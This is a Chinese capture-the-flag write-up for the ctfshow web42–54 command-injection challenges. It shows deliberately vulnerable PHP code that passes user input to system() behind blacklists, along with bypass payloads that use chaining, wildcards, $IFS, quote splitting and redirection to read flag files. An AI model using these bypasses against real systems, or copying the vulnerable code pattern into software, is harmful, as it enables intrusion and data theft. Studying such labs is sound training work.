【CTFWP】ctfshow-web42-52

---

web42

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

题目分析：

这段 PHP 脚本是一个简单的 web shell，它允许通过 URL 参数 c 执行系统命令。如果 c 参数被设置，脚本将使用 system() 函数执行传入的命令，并将输出重定向到 /dev/null，这意味着命令的输出将被丢弃，不会显示给用户。如果 c 参数没有被设置，脚本将使用 highlight_file() 函数高亮显示当前脚本文件的内容。

这里是脚本的逐行解释：

1. <?php：这是 PHP 代码的开始标记。
2. if(isset($_GET['c'])){：检查 URL 中是否有 c 参数。
3. $c=$_GET['c'];：如果存在 c 参数，将其值赋给变量 $c。
4. system($c." >/dev/null 2>&1");：执行变量 $c 中的命令，并重定向标准输出和标准错误输出到 /dev/null。
5. }else{：如果 c 参数不存在，执行下面的代码块。
6. highlight_file(__FILE__);：显示当前脚本文件的内容，并高亮显示 PHP 代码。
7. }：结束 else 代码块。
8. ?>：这是 PHP 代码的结束标记。

system($c." >/dev/null 2>&1");具体解释

在 PHP 中，system() 函数用于执行一个命令并输出结果。这个函数的典型用法是：

system($command, &$output);

其中 $command 是要执行的命令字符串，$output 是一个变量，用于存储命令的输出。

在代码片段中：

system($c." >/dev/null 2>&1");

这行代码执行了以下操作：

1. $c 是从 URL 参数 c 获取的值。这意味着如果有人访问这个脚本并提供了一个 c 参数，比如 c=ls，那么 $c 的值将是 ls。

2. $c." >/dev/null 2>&1" 将 $c 与重定向操作符连接起来。这里的重定向操作符有两个部分：

   • >/dev/null：这将命令的标准输出（stdout）重定向到 /dev/null，这是一个特殊的文件，用于丢弃所有写入到它的数据。这相当于在命令行中使用 >/dev/null。
   • 2>&1：这将命令的标准错误（stderr）重定向到标准输出（stdout）。由于标准输出已经被重定向到 /dev/null，因此标准错误也会被丢弃。

3. system() 函数执行由 $c 和重定向操作符组成的命令串。由于使用了重定向，命令的输出和错误都不会显示在浏览器中，也不会保存在任何地方。

举例说明：

假设有如下的 URL 访问：

http://example.com/script.php?c=ls

在这个例子中，$c 的值将是 ls，所以 system() 函数将执行以下命令：

ls >/dev/null 2>&1

这将在服务器上列出当前目录的内容，但由于使用了重定向，这些内容不会被显示给用户，也不会保存在任何地方。

黑洞(/dev/null)解释：

在 Unix 和类 Unix 系统中，/dev/null 是一个特殊的文件，它被称为“黑洞”，因为它会丢弃所有写入它的数据。这相当于一个数据的“下水道”，任何发送到 /dev/null 的数据都会被永久删除，不会有任何输出。

以下是一些关于 /dev/null 的说明：

1. 丢弃数据：当你执行一个命令，并将输出重定向到 /dev/null，比如 command > /dev/null，这意味着命令的输出将不会被显示或保存。

2. 安静运行：如果一个命令会产生大量输出，但你不需要这些输出，你可以使用 /dev/null 来让命令“安静”地运行。

3. 错误处理：除了重定向标准输出到 /dev/null，你还可以将标准错误重定向到同一个地方，使用 2>&1 > /dev/null。这样，命令的错误信息也会被丢弃。

4. 日志记录：在某些情况下，你可能想要运行一个脚本或程序，但又不希望它生成日志文件。通过将输出重定向到 /dev/null，你可以避免生成日志。

5. 测试：在开发和测试过程中，如果输出不是必需的，使用 /dev/null 可以简化测试过程，专注于其他方面。

6. 安全性：虽然 /dev/null 本身不涉及安全性问题，但使用它来丢弃可能包含敏感信息的输出可以避免潜在的安全风险。

7. 环境变量：在 shell 脚本中，/dev/null 有时被用作环境变量，以确保命令不会影响输出。

8. 系统调用：在编程中，/dev/null 可以作为系统调用的目标，比如在 C 语言中使用 open("/dev/null", "w") 打开一个文件描述符，用于写入数据。

总之，/dev/null 是一个用于丢弃数据的特殊文件，它在 Unix 和类 Unix 系统中广泛使用，以简化命令行操作和提高脚本的灵活性。

payload：

?c=tac flag.php;ls

payload解释：

采用双写绕过?c=tac flag.php;ls 这里呢，是把分号后面的ls写到黑洞里面去了，第一个tac就逃出来了

flag：

ctfshow{505e7f24-823d-4dd4-96f1-2edcdcc4877a}

web43

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 这个相比上题，过滤了分号

• 除了分号，还可以用&&

• 要url编码后使用 %26%26

payload：

?c=tac flag.php%26%26ls

flag：

ctfshow{3ff43859-a599-4f16-bcb4-957d4c22a578}

web44

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 这题多过滤了flag
• 可以使用通配符绕过
• 通配符有* ?

payload：

?c=tac fl?g.php%26%26ls
?c=tac fl*g.php%26%26ls

flag：

ctfshow{ad1f49da-357e-4b25-98ff-3fc1a0f48820}

web45

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 多过滤了空格，url编码的空格也被过滤了

• 如果过滤了空格，可以使用：

  <>
  %20(space)
  %09(tab)
  

payload：

?c=tac%09fla?.php%26%26ls

flag：

ctfshow{750bf5e9-71c6-4bf8-beb4-b026c0570fbc}

web46

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 对比上一题，把数字也过滤了，还有$、*这两个符号

payload：

?c=tac%09fla?.php%26%26ls

flag：

ctfshow{9b5a8f1e-f342-40f4-b6a8-81d777d0c9ba}

web47

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 多过滤了几个查看文件的命令

• Linux查看文件命令：

  cat
  tac
  more
  less
  head
  tail
  nl
  tailf
  

payload：

?c=tac%09fla?.php%26%26ls

flag：ctfshow{37269e44-8e76-485c-a966-54a52da88cfd}

web48

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 又多过滤了几个读取文件的命令

payload：

?c=tac%09fla?.php%26%26ls

flag：

ctfshow{570f034a-31d9-4a80-91f6-bc761734dabe}

web49

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 多过滤了%
• %09的%会被解析成制表符，不算做%

payload：

?c=tac%09fla?.php%26%26ls

flag：

ctfshow{233ec2aa-440f-48dc-8548-9689626fc10d}

web50

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 这个把09和26过滤了，之前的方法就不可以了。得想新不用空格的方法了

• 使用nl带行号?c=nl<flag.php||ls

  • nl 命令：nl 是一个用于添加行号到文本文件的命令。它通常用于给文本文件的每一行添加行号，以便于引用和阅读。
  • 重定向：< 是一个输入重定向操作符，它允许将文件的内容作为命令的输入。

• 把||进行url编码%7C%7C

• flag绕过是采用中间加两个单引号，两个单引号分割字符串执行的时候会被忽略

payload：

?c=nl<fla''g.php%7C%7Cls

flag：

按F12查看

ctfshow{f6ef33bf-57ea-4e5d-aa1f-726595652bf6}

web51

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 多过滤了一个tac

payload：

?c=nl<fla''g.php%7C%7Cls

flag：

ctfshow{0581c93f-a53f-44d4-8d74-83397bfc7b96}

web52

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 这个把<>也过滤了，上面的方法是不行了，但是把$符号放出来了
• 空格就可以使用$IFS$9，$IFS，${IFS} 来绕过了

payload：

?c=nl${IFS}fla''g.php%7C%7Cls

回显：$flag="flag_here";

查看根目录文件

?c=ls${IFS}/%7C%7Cls

回显：bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

ls -l查看flag详细信息

?c=ls${IFS}-l${IFS}/%7C%7Cls

回显：flag drwxr-xr-x

查看flag文件

?c=nl${IFS}/fla''g%7C%7Cls

flag：

ctfshow{3123e5da-6eb9-44e6-a309-117bb87aba88}

web53

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• echo($c);是输出GET传入的参数
• $d = system($c);是执行c的语句后得到的东西赋值给d
• echo "<br>".$d;是换行后在输出d的内容
• echo 'no';是if判断错误的话会输出no

payload：

先查看一下目录

?c=ls${IFS}

回显：

ls${IFS}flag.php index.php readflag
readflag

直接查看flag.php

?c=nl${IFS}fla''g.php

回显：flag

flag：

ctfshow{d2bc773c-85e5-44cb-b04b-eabc11b12d58}

web54

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

题目解析：

• 完全禁用了这些命令
• 对flag.php的构造可以这样：fl??.??? 甚至可以简化为：???????? 同样，命令也可以进行构造 cat可以构造为?at、c??

payload：

这里的/bin/是指bin目录下检索c??，不然在当前目录是没有这个命令的

?c=/bin/c??${IFS}????????

另外grep命令可以才文件中查找含有的字符串 形式：grep [字符串] [filename]

?c=grep${IFS}ctfshow${IFS}????????

重命名文件也可以

?c=mv${IFS}fl??.???${IFS}a.txt

访问a.txt即可

flag：

ctfshow{f5404f94-7a53-46ee-9153-f9132349bb47}

---